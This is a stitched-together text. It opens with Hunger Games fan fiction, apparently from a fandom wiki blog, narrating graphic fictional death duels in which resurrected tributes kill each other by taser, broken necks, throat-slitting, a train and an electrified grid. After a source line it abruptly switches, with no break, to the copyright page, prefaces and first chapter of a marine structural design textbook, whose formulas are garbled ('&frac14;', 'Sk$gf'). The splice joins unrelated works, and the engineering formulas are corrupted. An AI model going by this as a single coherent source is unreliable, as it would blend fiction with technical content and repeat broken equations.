"Are we gonna get him or what?" A small, impish girl sneers from the eastern stairs. Di Thorn. My District partner. Despite only being twelve years old she was a psychopath. Someone obsessed with killing and maiming. I wasn't surprised when she joined the Careers.

"Just try it, Di!" I position my body to face her and tighten my grip on the taser. "Let's finally see who'd win a fight between the two of us!"

A smirk crosses her khaki face. "I don't have to fight you."

The sound of his footsteps slapping on the smooth floor give him away. I turn just as he's grabbing a knife from the table. Elecc (325) has a short scream as my taser jabs him and then he's on the ground, shaking as errant streaks of white heat snake around him. I passively watch as the electricity ebbs away and leaves his prone body, smoking slightly. "Anyone else want to try their hand?" I ask, trying to keep my voice from shaking. I need to appear strong, unimpressed by their numbers. Or else I'll perish.

I spin around, gazing at the remaining six tributes. They don't answer me, their faces are stony and silent. Then one of then comes rushing towards me.

I hold my taser out but the boy slides to his knees and holds his hands together. "Please! Don't kill me! I'm with you, Noah! Two of us can live, just let me help you and we can win this together!" The boy looks up to me with pleading blue eyes hidden behind wired glasses. His beanie hat covers his ruffled brown hair and I recognize him as the boy kept in the cell across from me, the one who always cried for his family. I can't kill him.

"Then get up!" With one hand I pull the boy to his feet. He flashes me a small smile and then grabs a knife off from the table with trembling fingers. The two of us face the others.

"Chip! We were allies in the Games!" A brunette girl shouts to my new ally. Beside her, Electronny cries silent tears. "Are you just going to abandon us now? Kill us even? Just so you can stay alive?"

Chip opens his mouth but doesn't speak. He's conflicted; He wants to help his friends but he also wants to live. And I give him the best chance of living. The girl waits for him to say something but he doesn't. He keeps his gaze fixed on the floor and I shake my head. "Are you saying you wouldn't kill him?" I challenge the girl, Vision (325). "That you'd rather kill Elecctronny then him?" I gesture at the small frightened girl beside her. "No? Then shut up and fight. People have to die. And it doesn't matter who--"

A heavy weight drops onto my shoulders, drives me to the floor. The taser slips from my fingers and slides across the floor as chaos breaks out. Vision and Elecctronny charge forward as another girl grabs Chip from behind. I go to help when I'm spun around and faced with the snarling vestige of Di. "Think you're some kind of visionary?" She growls as her fist strikes me access the face. "With your pretty speeches and making allies out of the downtrodden?" Her blows disorient and then her slender hands slip around my neck and pull me up. "Well, you're not. You're no visionary. You're just another forgettable kid!" She smashes my head into the keyboard for one of the computers. The keys clack as my head screams in agony as she repeats the process. She brings my head down for the fourth knock when I catch the side of the table with my hands. I throw an elbow into her ribs and she let's out an Oomph! of pain, giving me the opportunity to shove her away and dive across the floor.

I slide across to the other side, stopping right next to the taser. I hear Di shouting angrily and then I roll onto my back as she throws herself towards me. Unfortunately for her, she just lands on the business end of a tazer.

Spittle flies from her mouth as the electricity sparks her body. Her arms and legs kick out as she falls backwards, contorting unnaturally as she rolls and throbs. Then she goes still, dead at last.

I give myself only a few seconds to breathe easy and survey my surroundings. The chaos that had started just a moment ago has already created casualties. Elecctronny lies dead on the cold floor, her neck bent at an odd angle. Syren (302) is on top of Vision, squeezing a thin wire around her throat. I think it's barbed, because blood begins to flow from where the wire touches skin. And finally, Bethunia (301) is kicking and beating away at Chip as he lies on the floor, curled in a ball.

It's her who I attack first. I spring to my feet and jab Bethunia square in the back with the tazer. She goes down like the rest, kicking and convulsing. Nothing new here. Just another unnecessary death. "Are you okay?" I pull Chip to his feet and give him a thorough look over. His lip is bloodied and black bruises cover his face but nothing looks too serious or fatal.

"Y-yeah...I think..." He coughs feebly and then, when he looks up, a flash of horror crosses his face. "Noah! Behind you!"

I'm tossed backwards to the floor. A foot stomps on my ribs and I hear a loud crack. Breathing becomes difficult and I see the face of Syren as she looks down on me. She was a Career recruit in her Games. Brutality is just second nature. She smiles and lifts her foot to crush my skull when a new expression forms. Confusion.

Her eyes glance downwards but she never sees what happened. Her knees buckle she collapses to the ground, I see the knife buried in her back and realized what happened.

Chip.

He doesn't even say anything to me. He just drops to the ground and curls back into a ball, sobbing and crying out for someone named Kinsey. Nothing else moves. All of the other tributes are dead, leaving us as the two survivors. "Congratulations to us," I mutter sarcastically and try to sit up. I can't. My ribs hurt too much so I'm forced to settle with leaning back against the computers.

The air is scented with blood and burnt flesh. Some of the dead tributes still smoke from the effects of the taser. I say no more and think of nothing as I sit in the room of death. Chip is still sobbing, but quietly now. I think he now calls for his parents. Poor boy.

I lean my head back and close my eyes, waiting for the moment when the Capitol will come for us and put me in the Hunger Games, where I will regrettably kill once more.

District 4 Death Duel

Trident Bekke (302nd Games)

I'm not nervous, I'm not concerned, and I'm definitely not frightened. One thing I am is excited. Excited for the possibility of living once more.

Being dead sucks. You don't do anything cool, you don't do anything at all! At least, what I remember of it. Which isn't anything. Which is kinda weird really. I remember being stabbed by that hot girl from District 7 and then I don't remember a thing until some Capitol dude wakes me up and claims to have resurrected me. Something is off about that. I don't know what, but something is. Feels like I'm missing something obvious...something--

"Prepare for Duel commencement."

I look up to the ceiling and flash one of my most charming smiles. "Okay, lady. Whatever you say. "Just make sure I get up there in one piece, ya know?"

The platform rises and next thing I know, I'm in the middle of some sort of ocean or whatever. Pure blue water surrounds me and in the distance a large rocky outcropping shines under a bright yellow sun. "Woah. That's bright!" I squint my eyes from the intense sunlight so it's several more seconds before I notice the beautiful girls that surround me.

There's four of them and they're all standing on platforms like me, meaning they're also tributes. Three of them are positioned to my right and the other is on my left. All of them look to the outcropping in the distance, which I can now see is surrounded by a stretch of sand and littered with tools used back in District 4. Nets, fishing hooks, tridents, bidents, harpoons, etcetera, etcetera. Boring stuff. I look to the girl to my left, a tan orange-haired hotty with green highlights and call out. "Hey, beautiful. You have anything goin' on tonight?"

She looks to me with a twinkling eye and cunning grin. "Oh, I don't know. I might be celebrating a few killings, nothing much."

I go to respond when another girl, a brunette and the hottest girl in this row of platforms, interrupts with a shout. "What the hell are they waiting for?! Get this started already!"

"Wow. You're a frisky one, ain't chu?"

The girl spins to face me, armed with a glare that would make most shiver in fear. I just smile and wink. "If you're so bored, you could entertain me. I really think--"

"She's moving! She's moving!"

The first girl I spoke to, Seafoam I think I remember her name from the brief info we were given, is shouting and pointing behind the brunette. Another girl, a creamy haired blonde, has stepped off her platform with a dazed look on her face. It sounds like she's speaking to herself.

"Gonna have to pass on that offer," The brunette cackles gleefully and jumps off her platform, splashing into the two foot deep water. "Because this game has just begun!" She sprints for the girl who moved, Nymph (325), and pairs her up. Then she strikes forward with a lightning quick bladejab and the girl goes falling to the water, her trachea almost assuredly broken from the force of that blow. "Wow. She really knows how to fight, eh?" I speak to Seafoam (326) before realizing that she has already gone sprinting for the outcropping. Dang, these girls really love to kill don't they? I like it. Makes them much more...interesting.

The fourth girl on the platforms, Kaylay from the 300th, goes charging Miss Kills-A-Lot in what has to be the worst idea in the history of forever. Kaylay throws a punch that's easily dodged and then Fressa, for that is her name, grabs her in a arm bar and jerks back, effectively breaking Kaylay's right arm.

The girl howls in pain and then Fressa just pulls her into a headlock and does what she did to the arm again. Only this time it's Kaylay's neck that breaks. "You're not very smart, are you?" Fressa drops the body and watches it float neck to Nymph's.

"You talking to me?" I smile coyly as she turns around. Her gorgeous brown eyes are filled with a bloodlust as she coldly regards me.

"Who else would I be speaking to, stupid? A fish?" She laughs scornfully and begins to approach me, which I actually find more exciting than terrifying. "You should have ran with Seafoam. Why didn't you?"

I shrug as if we're speaking about something trivial. "I just like watching hot girls kick ass."

"Well, you're gonna die now. I hope it was worth it!" She lunges for me but I hop our of her reach and wag a knowing finger.

"Ah, ah, ah! You should really get to that outcropping. Because if you don't, someone else will claim those weapons. Someone much bigger and stronger than me."

"You got lucky."

She turns and runs. Just like that. I watch as she sprints for the outcropping, marvelling her perfect form. I really hope she lives. I'd much rather her be my co-survivor so than some sweaty muscle-head.

Fressa Saltie (325th Games)

Already the others have reached the outcropping, already they've begun fighting. Wari (301) lies dead on the sand. I curse my own ineptitude. I should have killed Trident within seconds and then came here right away. Now I'm at a disadvantage.

At the outcropping, it's Wayne (325), the giant who had rejected the Careers invitation in his Games, who draws the most attention. He sits in the center of the sandy turf, a trident in each hand as he circles around to keep everyone in his field of view. No one wants to take the risk of being the first to charge him. No one is that stupid--

A boy suddenly darts forward, a harpoon in his hand. Foolishly he raises it to spear Wayne but he's given the boy far too much time to react. Cody doesn't even have time to strike before one of Wayne's tridents hits him in the chest and he goes tumbling into the sand. Moron.

But still, his charge didn't go to waste. Flick, the runner-up of the 300th Games and a boy who looks more like a man, sees that Wayne is distracted and chucks his own bident into the giants leg. As Wayne howls and drops to one knee, Flick charges forward, ducks under the giants swinging trident, and throws his entire body into him. They fall to the sandy floor and begin to brawl just as Giller, one of my allies from the 325th Games and about the only one I didn't betray, comes jogging up to the outcropping. I see my opportunity. "Giller! Finish off the winner of that brawl! I'll end Seafoam!" Always the obedient one, he nods and pulls the harpoon from the dead Cody's hands. I turn to face Seafoam with manic grin.

"Wait. What?" The daft girl doesn't understand what just happened and by the time she has even an inkling of it, I've tackled her to the ground and pried the fish hook she held so proudly from her hand. Her desperate eyes watch mine as I use the hook to slice her throat open.

She dies just like the rest. Her life bleeds out of her, smearing in the sand and being washed into the water, where it turns a pale pink. She was worthless. An easy kill.

"Fressa! Fressa! I need help, Fress--"

A wet gurgle cuts off Giller's screams and I turn to see Flick ripping the harpoon from his neck. Dark crimson blood stains his hands and I see Wayne lying stiffly on the sand. This guy is good.

"I intend to come out of here alive," Flick says as he faces me, twirling a trident with his deft fingers. "Will you let me?""

"Is that it? You're so frightened you won't win that you've resorted to begging?" I sneer at him, showing my utter contempt for everything he is. He shrugs modestly.

"Not really. I was just being a gentleman," He gives a dramatic sigh and then looks at me with a sly smile. "Guess I'll just have to kill you."

I'm expecting him to throw the trident, so I'm taken back by his feint. He crosses the gap between us in a few seconds, his long legs giving him the advantage. I'm forced to duck and dodge to stay alive, no easy task. The tip of his trident catches me twice, once on the thigh and the other against my forearm. Both leave bleeding cuts.

"You're fast," He says when I duck under one of his ridiculously powerful thrusts.

"Or you're slow," He grins at my retort and thrusts again. This time I'm not quick enough to duck and I yelp in pain as the tip of my ear is sliced open. His grin widens.

"I'd say that you're fast. But maybe not fast enough."

He unleashes a flurry of strikes, I dodge them all until I step into the blunt end of the trident as he brings it forward. Flick follows up by smacking me in the crown of the head and then I'm sprawled on the ground, completely at his mercy. His eyes glint as he readies himself to finish me.

"Deus ex machina."

"Huh?" He doesn't pause as he brings the trident down where my head once was. But I've moved it just a few inches, prolonging my life for another moment.

"Deus ex machina," I repeat. "Deus ex machina is a plot device whereby a seemingly unsolvable problem is suddenly and abruptly resolved by the contrived and unexpected intervention of some new event, character, ability or object. And it's gonna happen right now."

The confusion on his face turns to fear as he spins around to face the person coming to my rescue. Only thing is, no one is coming to my rescue. When he sees no one in sight he spins back to face me but he already took the bait.

My foot smashes him between the legs and he cries and screams as he collapses. I don't waste time mounting him and slicing his throat with the same fish hook I used upon Seafoam. Deus ex machina indeed.

I stand and wipe my bloodstained hands on my shirt as I survey the outcropping. I've won. Everyone else is dead. I smile as the announcement confirms this. But the smile fades when it mentions the other survivor.

Trident Bekke.

"Hey toots, glad you took care of them all for me!" I see the boy as he comes jogging through the water, his blonde moppish hair bouncing along. A cold angry burns in my chest as I realize that I've been used. He sent me here to fight and kill his competition while he sat back and did nothing. Clever. Usually I'd appreciate such thinking, but not when it's used against me. "You're a real sweetheart, ya know?" A grin forms on Trident's face and I go to respond when I realize that I can no longer move. Shapes writhe in the distance, Peacekeepers or scientists sent to retrieve us. They must have immobilized me in case I was going to attack Trident. I wasn't. I have an entire Hunger Games ahead of me, full of opportunities for my revenge. I can wait a while longer.

I'm a patient person.

District 5 Death Duel

Sebastian Hive (325th Games)

I'm quite possibly the most prepared tribute in these Duels. I'm most assuredly the most prepared one from District 5. I've looked over the info cards they prepared for us countless times. I know my enemies weaknesses, their strengths, I know how they died, what their Games strategy was and how they failed in it. I know just about everything valuable about them.

And now I will kill them.

My platform rises, brings me into the duelling arena. Other tributes rest on their platforms beside me, their nervous eyes taking in the surroundings. We're on a long platform, the ground a see through mesh grid. Beneath us I can see the crackling electricity arcing across the ground. Behind me is a small concrete flooring in the back of the room. A large machine of sorts rests on it. I haven't the faintest idea what it is for.

But he does.

I see his plump red face, his body and it's rolls of fat, the glasses on his face and his messy red hair. Watt Powers, male tribute from the 301st Annual Hunger Games. Unlike the other tributes who've lined themselves up to face forward, he does the opposite. He stares at the machine with a delighted grin on his fat face, like he just got the most magnificent present for Christmas.

Very curious.

There is no gong, no signal that the competition has begun. One moment we're just standing there idly and the next a girl is rushing off of his platform. I recognize her face from the info cards. Allie Costigan from the 300th Annual Hunger Games. She's the first to realize there's no timer but the others follow suit. Soon they all go rushing for the center of the grid, away from platforms.

Except for Watt.

He watches the others run with a grin etched on his face and then he plops off of his platform and goes waddling for the machine. I simply must find out what is so special about it.

I follow the boy as he drops beside the machine and casually pries a panel off of it, revealing a mess of wires and electrical sockets. He goes to meddle with these when I grab him around the shoulder and he yelps in fear. "Don't kill me!" He screams pathetically without even turning around. "I can fry the others! You can win without even lifting a finger!"

Peculiar. "How so?" I ask the boy and he finally turns around. I grimace as I see his fat jowels flap about as he speaks.

"I--See the grid? The meshy wire like stuff?" He points at the ground that covers every inch of the room except for the small area where we stand.

"Of course I see it! Do you think I am daft, goodman?"

"No!" Terror lights his eyes as he thinks he has offended me. I can't hold back a laugh at how awestruck this little piggy is. "I would never! I wouldn't--"

"Cut to the chase. I have no time for this nonsense." Already I can hear the other tributes fighting. I hear their yells and screams. Curiously, there doesn't seem to be any provided weapons. They fight with their fists alone.

"Okay. Okay. Well, That mesh is used in the power plants back in District 5. Which this whole area is meant to resemble, obviously."

I nod. "Of course. I knew that right away." This is a lie. I've never stepped foot inside a plant, much less know what one looks like. But no point in making myself look inferior. "But what does this machine have to do with this?"

"I'm getting there. The mesh is used to channel electricity from either room to room or plant to plant. Vast amounts can travel through it without frying the wires, however the grid itself is very hazardous. One touch would kill you instantly. And that machine," He jerks a thumb at the metallic contraption behind us. "Is what generates the electricity. When turned on the entire gird will become alive with enough electricity to kill twelve elephants."

"Can you turn it on?" I ask eagerly. The thought of being able to kill every single tribute in this room without having to do it manually is...enthralling, to say the least.

"Uh, hello?" The fatty pulls against my grip and I let go. "That's what I was doing before you stopped me! It'd already have been done and we could be sitting in a comfy room eating poptarts and..."

"Get to work," I quickly interrupt him. "I'll watch your back and make sure you have enough time." He blinks in confusion and then I see that look again. He's still awestruck.

"Does this mean we're allies?" His voice is high with excitement.

"For now, yes. But get to work!" I give him a sharp shove and he nods with ecstasy as he turns to fiddle with the exposed wires. I watch the others as they fight, punching and kicking with all their strength. There's still no weapons and I now know why. This machine is meant to be our weapon. I suppose that the Gamemakers thought we'd all know what it did. They certainly wouldn't have anticipated that only the fatty would know it.

Thinking of the fatty, he would make an intriguing ally once we enter the Games. In my last Games I made one crucial mistake. I only recruited hardened killers and no one else. Mayhap I would have won, if I had been in the same arena as my allies, but nonetheless, I wound up dead on the jungle floor. I will not allow that to happen again.

Allana (325), one of my original allies, is in this Duel. She's punching and biting with the rest right now. She'll die when Fatty activates the machine. I do not care for her at all, she was a useless ally to me. And the only reason I keep allies is for their usefulness. "Nearly done!" Fatty calls over his shoulder as he continues to do something with the open panel. "Just a couple more moments!"

"You better hurry," I tell him grimly as a tribute suddenly comes straight towards us. "Because it looks like we have company."

It's not just a District 5 scrub who challenges me. It's Philo Ventus (326), the giant who stayed hidden for the entirety of his Games until the finale. He would have won if he hadn't been struck down from behind whilst finishing someone off.

"You looking for something?" I ask the giant with a polite nod of the head. Manners are crucial, even when dealing with a horrid beast like Philo. His eyes just flicker to Fatty and the machine, a peculiar look crossing his face. Then it transforms into a glare. "Ah. I see that you understand what is happening!" I laugh lightly and step forward to block his path towards Fatty. "I did not expect a mangy mongrel like yourself to understand the principles of electricity. I would have thought that even simple fire would be too much for you."

His massive hands curl into fists at his side. He doesn't like to be insulted. Good. "They said you were a kind person, a gentle giant of sorts. Someone who innately disliked fighting. But I know the truth. It's not that you dislike fighting, you're just afraid of it. You're a bleeding heart coward!"

His nostrils flare and he steps even closer. "I don't like bullies."

A smile crosses my face. "And I don't like giant freaks who have no place in society."

His fist flies for me but I know it's coming. His initial blow misses and he tries with his left hand and this goes the same way. I was taught how to fight by the finest trainers in District 5, I've spent years learning the fine art of combat, understanding how my enemy works and how to avoid his attack. This ignoramus just throws punches as hard as he can without even the semblance of subtlety or planning. I could dodge him for days.

His attacks keep coming hard and fast but I continue to duck and weave past them. He's getting annoyed and grunts in exasperation with each missed strike. When I see an opening I step forward and deliver three quick jabs to his ribcage before bounding back again as his fists seek my head. He always misses.

The battle continues on like this. He attacks. I dodge. I counter his attack. He desperately tries to drop me. He fails. Repeat. I'm convinced that I don't even need Fatty's help when a massive fist comes for my head and I dodge out of the way. Straight into another fist.

It smacks me in the stomach and drops me to the ground. I groan and cough, feeling like I've just been hit by a truck. Philo stomps his boot down on my ankle and I scream as I feel the crack rip through my body. My first mistake was not seeing his feint. My second was not rolling when I had the chance.

"Seb! I got it!" Fatty jumps to his feet and waves frantically for me, screaming at the top of his lungs. "Hurry up and get on the concrete before the grid turns on!"

Philo's huge head turns to face him and that's when I raise my uninjured leg and kick him in the gut. Fatty screams for me as I begin to hobble towards the slab of concrete and the machine. I wish he would shut up. The other tributes are beginning to notice us and will soon figure out what he means by "the grid will turn on".

I'm almost there when I hear Philo running after me, his giant legs pounding against the mesh grid. Fatty clutches a switch on the machine and I scream for him to pull it when I dive for the concrete.

He pulls it.

I don't see the result but I hear it. The crackling sound of the machine turning on and then the simultaneous screams of the tributes as electricity tears through their bodies, Philo's included. It only lasts for a few seconds and then there's a mechanical whirring and the screaming stops. A pudgy hand pulls me up. "Ha ha! Look at em'! There all skeletons!" Fatty crows viciously as I stand on one good leg, grimacing when I see my twisted right ankle. I pray that the Gamemakers will have it fixed before plopping me in the Games. "They all thought I was an easy kill! Well, guess they were all wrong, weren't they?" Fatty continues to boast about his accomplishments as I stare out at the grid. He wasn't lying when he said they were skeletons. The tributes who weren't as smart as we were lie dead, just a charred skeleton amid the ruins of a battlefield. That electricity was even stronger than I thought.

"Good job, Watt," I clap Fatty on the shoulder and give him a proud smile. "You showed them alright."

"Yeah! Yeah I did!" He's like a puppy. Give him praise and treats and in exchange he'll be loyal to you. He'd make a most excellent ally in the Games. "We make a great team!" He puffs out his pudgy chest and strikes a ridiculous pose. I tell him he looks quite heroic and he grins stupidly.

"Will you ally with me in the Games?" I ask him, knowing that the answer won't be anything other than a resounding yes. His grin somehow widens even further.

"Yeah! Of course! We'll be like, the most unstoppable team ever! Everyone will fear us! I have the brain, you have everything else!"

I chuckle softly and clap him on the shoulder. Such a naive boy. Naive, but admirable. His intelligence is unparalleled but he has much to learn about everything else. Still, he is the best ally I could ever hope for. Someone who is undeniably loyal to me and yet is not a threat to me in the slightest.

The two of us will conquer the 400th Games.

District 6 Death Duel

Cosmo Fyngelli (300th Games)

I stand on the platform of a train station as the platform finishes its ascent. Behind me is a solid brick wall and there's two more platforms ahead of me, across two sets of train tracks. One of the platforms rests in between the two tracks and has a metal table laden with items. The other is on the far side of the station. I see five tributes on their platforms there.

Just like us.

Four tributes are in the same platform as I. Two of them are to my right, two to my left. When we first arrived they all looked around at each other but now they don't give anyone a second look. We're all just focused on what must be done.

I take a shaky breath as a signal lamp that hangs above the near track suddenly lights up. A frown crosses my face but three of the tributes surrounding me take it as a sign that the Duel has begun.

They spring off of their platforms like rabbits, not bothering with me and the small girl who have remained motionless. They don't hear the rumbling that comes from the dark tunnel, they don't listen to the flashing light on the signal lamp as it bleeps and bloops rapidly.

Their ignorance is death.

A train comes speeding out from the tunnel. One of the high-tech ultra trains that we of District 6 build for the Capitol. It can travel up to speeds beyond three hundred miles per hour. Those poor tributes never had a chance.

One second they're racing across the track, the next they're swallowed by the train. I cry out in horror as I hear the terrible sounds of cracking bones and ripping flesh. Squirts of red spew out from under the train, splashing my face and making me gag, sickened by the sight. Then, only mere seconds later, the train disappears back down the opposite tunnel.

There's hardly anything left of the tributes who ran. There's just bits of torn flesh and fragments of bone. A slimy, crimson grist sticks to the tracks and the station reeks of fresh blood and death.

Ding! Ding! Ding!

Three separate chimes go off, three faces in the sky blank out. Illegal Drugs (302), Belladonna Saware (300) and Blondie Genesis (326) no longer live. Only seven tributes left.

Despite the horror that now swims in my thoughts I force myself to run forward. Death is coming and I need to be proactive to avoid it. The scraps of bloody flesh left behind by the train squish under by feet as I sprint across the track towards the center platform. I try not to vomit as I scrabble up onto the platform.

Another boy comes from the opposite side. He's tall and lean, a wiry sort of boy that always looks like he's about to flee. Except he doesn't flee; He instead runs for the table. I'm not fast enough to reach it before him. His long legs give him ample time to arrive at the square wooden table and pluck his desired weapon off of it. A steering wheel.

Wait.

A steering wheel?!

My mouth falls open in shock and then I shake my head furiously to clear my thoughts. The table only holds items that pertain to our District. Only things like tire irons, gears, pipes, and a whole sort of other stuff that I don't recognize. But I'm still confused. Why'd he pick a steering wheel?

The heavy wheel smashes down onto the crown of my head. In my confusion the boy had closed the gap between us and now beats me down with the wheel. It's a better weapon then it looks. I roll into a kneeling position and throw a punch at the boy's thigh. He blocks of but then I throw ny hands around his waist and pull him towards me. He goes flipping over my head and lands in the pit of the train tracks, very much alive but now covered with a bloody red grist.

Not my problem, I think. The table is still there with the weapons and I plunge towards it, my hands wrapping around the first thing I lay eyes on. But I haven't even had time to pull it towards me when a heavy object slams into the back of my skull.

Wolbert Toonico (325th Games)

Cosmo (300) doesn't utter a sound as my tire iron slams into his skull. The wound leaves no blood but there's a dent in his head, such a deep dent that I have no doubt that he will die, if he hasn't already.

It's a terribly sad sight, seeing that poor boy lying lifeless on the table, slowly sliding back to the ground. He didn't deserve this. None of us do. But it's what we've got, what we have to deal with. Kill or be killed. That's just what has to happen.

I hate myself for rationalizing the murder I just committed.

Источник: https://thehungergames.fandom.com/wiki/User_blog:LightStone123/400th_Annual_Hunger_Games
Marine Structural Design Second Edition Yong Bai Wei-Liang Jin AMSTERDAM • BOSTON • HEIDELBERG • LONDON NEW YORK • OXFORD • PARIS • SAN DIEGO SAN FRANCISCO • SINGAPORE • SYDNEY • TOKYO Butterworth-Heinemann is an imprint of Elsevier Butterworth-Heinemann is an imprint of Elsevier The Boulevard, Langford Lane, Kidlington, Oxford OX5 1GB, UK 225 Wyman Street, Waltham, MA 02451, USA Copyright &copy; 2016 Elsevier Ltd. All rights reserved. No part of this publication may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, or any information storage and retrieval system, without permission in writing from the publisher. Details on how to seek permission, further information about the Publisher’s permissions policies and our arrangements with organizations such as the Copyright Clearance Center and the Copyright Licensing Agency, can be found at our website: www.elsevier.com/permissions. This book and the individual contributions contained in it are protected under copyright by the Publisher (other than as may be noted herein). Notices Knowledge and best practice in this field are constantly changing. As new research and experience broaden our understanding, changes in research methods, professional practices, or medical treatment may become necessary. Practitioners and researchers must always rely on their own experience and knowledge in evaluating and using any information, methods, compounds, or experiments described herein. In using such information or methods they should be mindful of their own safety and the safety of others, including parties for whom they have a professional responsibility. To the fullest extent of the law, neither the Publisher nor the authors, contributors, or editors, assume any liability for any injury and/or damage to persons or property as a matter of products liability, negligence or otherwise, or from any use or operation of any methods, products, instructions, or ideas contained in the material herein. ISBN: 978-0-08-099997-5 British Library Cataloguing-in-Publication Data A catalogue record for this book is available from the British Library Library of Congress Cataloging-in-Publication Data A catalog record for this book is available from the Library of Congress For Information on all Butterworth-Heinemann publications visit our website at http://store.elsevier.com/ Publisher: Joe Hayton Acquisition Editor: Carrie Bolger Editorial Project Manager: Naomi Robertson Production Project Manager: Jason Mitchell Designer: Matthew Limbert Typeset by TNQ Books and Journals www.tnq.co.in Printed and bound in the United States of America Preface to First Edition This book is written for marine structural engineers and naval architects, as well as mechanical engineers and civil engineers who work on structural design. The preparation of the book is motivated by the extensive use of finite element and dynamic/fatigue analyses, fast-paced advances in computer and information technologies, and the application of risk and reliability methods. As the professor of offshore structures at Stavanger University College, I developed this book for my teaching course TE 6076 “Offshore Structures” and TE6541 “Risk and Reliability Analysis of Offshore Structures” for MSc and PhD students. This book has also been used in IBC/Clarion industry training courses on the design and construction of floating production systems for engineers in the oil/gas industry. As reliability-based limit-state design becomes popular in structural engineering, this book may also serve as a reference for structural engineers in other disciplines, such as the engineering of buildings, bridges, and spacecraft. My former supervisors should be thanked for their guidance and inspiration. These include: Executive Vice President Dr Donald Liu at the American Bureau of Shipping (ABS), Prof. Torgeir Moan at the Norwegian University of Science and Technology, Profs. Robert Bea and Prof. Alaa Mansour at the University of California, Berkeley, Prof. Preben Terndrup Pedersen at the Technical University of Denmark, Prof. T. Yao at Osaka University, and Prof. M. Fujikubo at Hiroshima University. The friendship and technical advice from these great scientists and engineers have been very important for me in developing the materials used in this book. As manager of the advanced engineering department at the JP Kenny Norway office (now a section of ABB) and manager of the offshore technology department at ABS, I was given opportunities to meet many industry leaders of oil companies, design/consulting offices, classification societies, and contractors. From ISSC, IBC, SNAME, OMAE, ISOPE, and OTC conferences, as well as industry (ISO/API/Deepstar) committees, I learned about recent developments in industry applications and research. The collaboration with Dr Ruxin Song and Dr Tao Xu for a long period has been helpful in my development of research activities on structural reliability and fatigue, respectively. Sections of this book relating to extreme response, buckling of tubular members, FPSO hull girder strength, and reliability were based on my SNAME, OMAE, and ISOPE papers coauthored with Profs. Preben Terndrup Pedersen and T. Yao, and Drs Yung Shin, C.T. Zhao, and H.H. Sun. Dr Qiang Bai and PhD student Gang Dong provided assistance in formatting the manuscript. Prof. Rameswar Bhattacharyya, Elsevier Senior Publishing Editors James Sullivan and Nick Pinfield, and Senior Vice President James Card of ABS provided me continued encouragement in completing this book. xxvii xxviii Preface to First Edition I appreciate my wife Hua Peng and children, Lihua and Carl, for creating an environment in which it has been possible to continue to write this book for more than five years in different cultures and working environments. I wish to thank all of the organizations and individuals mentioned in the above (and many friends and authors who were not mentioned) for their support and encouragement. Yong BAI Houston, USA Preface to Second Edition It has been 12 years since the 1st edition of the book Marine Structural Design was published by Elsevier. The 2nd edition of this book reflects upon the new technologies developed by the oil &amp; gas and shipbuilding industries and contains 50 chapters, 16 of which are new. With the rapid development of marine structural engineering, researchers and engineers are constantly exploring and advancing new design and analysis methods in this field. More and more new materials are being applied to marine structures, and new types of these structures have appeared. In addition, considerable progress has been made in areas such as reliability theory, risk assessment, fixed platforms, and FPSOs. The newly added chapters of this book focus on all the aforementioned areas, and we’d like to introduce the new progress to our readers. We hope that this book is a useful reference source for marine structural engineers and naval architects, as well as mechanical and civil engineers who work on structural design. The authors would like to thank their graduate students, PhD students, and postdoctoral fellows who provided editing assistance (Mr Huibin Yan and Mr Alex Lam). We appreciate the assistance of Elsevier in the editorial and publishing work. We wish to thank all of the organizations and individuals mentioned above (and many friends and authors who were not mentioned) for their support and encouragement. Prof. Yong Bai &amp; Prof. Weiliang Jin xxix CHAPTER 1 Introduction 1.1 Structural Design Principles 1.1.1 Introduction This book is devoted to the modern theory for design and analysis of marine structures. The term “marine structures” refers to ships and offshore structures. The objective of this book is to summarize the latest developments of design codes, engineering practices, and research into the form of a book, focusing on applications of finite element analysis and risk/reliability methods. Calculating wave loads and load combinations is the first step in marine structural design. For structural design and analysis, a structural engineer needs to understand the basic concepts of waves, motions, and design loads. Extreme value analysis for dynamic systems is another area that has had substantial advances from 1995 to 2015. It is an important subject for the determination of the design values for motions and strength analysis of floating structures, risers, mooring systems, and tendons for tension leg platforms. Once the functional requirements and loads are determined, an initial scantling may be sized based on formulas and charts in classification rules and design codes. The basic scantling of the structural components is initially determined based on stress analysis of beams, plates, and shells under hydrostatic pressure, bending, and concentrated loads. Three levels of marine structural design have been developed: • • • Level 1: Design by rules Level 2: Design by analysis Level 3: Design based on performance standards Until the 1970s, structural design rules were based on the design by rules approach, which used experiences expressed in tables and formulas. These formula-based rules were followed by direct calculations of hydrodynamic loads and finite element stress analysis. The finite element methods (FEM) have now been extensively developed and applied to the design of ships and offshore structures. Structural analysis based on FEM has provided results that enable designers to optimize structural designs. The design by analysis approach is now applied throughout the design process. Marine Structural Design. http://dx.doi.org/10.1016/B978-0-08-099997-5.00001-0 Copyright &copy; 2016 Elsevier Ltd. All rights reserved. 3 4 Chapter 1 The finite element analysis has been very popular for strength and fatigue analysis of marine structures. During the structural design process, the dimensions and sizing of the structure are optimized, and structural analysis is reconducted until the strength and fatigue requirements are met. The use of FEM technology has been supported both by the rapid development of computers and by information technologies. Information technology is widely used in structural analysis, data collection, processing, and interpretation, as well as in the design, operation, and maintenance of ships and offshore structures. The development of both computers and information technologies has made it possible to conduct complex structural analysis and process the results. To aid the FEM-based design, various types of computer-based tools have been developed, such as CAD (computer-aided design) for scantling, CAE (computer-aided engineering) for structural design and analysis, and CAM (computer-aided manufacturing) for fabrication. Structural design may also be conducted based on performance requirements such as designing for accidental loads, where managing risks is of importance. 1.1.2 Limit-State Design In a limit-state design, the design of structures is checked for all groups of limit states to ensure that the safety margin between the maximum loads and the weakest possible resistance of the structure is large enough and that fatigue damage is tolerable. Based on the first principles, the limit-state design criteria cover various failure modes such as • • • • Serviceability limit state Ultimate limit state (including buckling/collapse and fracture) Fatigue limit state Accidental limit state (progressive collapse limit state). Each failure mode may be controlled by a set of design criteria. Limit-state design criteria are developed based on ultimate strength and fatigue analysis, as well as the use of the risk/reliability methods. The design criteria have traditionally been expressed in the format of working stress design (WSD) (or allowable stress design), where only one safety factor is used to define the allowable limit. However, in recent years, there is an increased use of the load and resistance factored design (LRFD) that comprises a number of load factors and resistance factors reflecting the uncertainties and the safety requirements. Introduction 5 A general safety format for LRFD design may be expressed as Sd Rd (1.1) where P Sd &frac14; Sk$gf, design load effect P Rd &frac14; Rk/gm, design resistance (capacity) Sk &frac14; Characteristic load effect Rk &frac14; Characteristic resistance gf &frac14; Load factor, reflecting the uncertainty in load gm &frac14; Material factor, the inverse of the resistance factor. Figure 1.1 illustrates the use of the load and 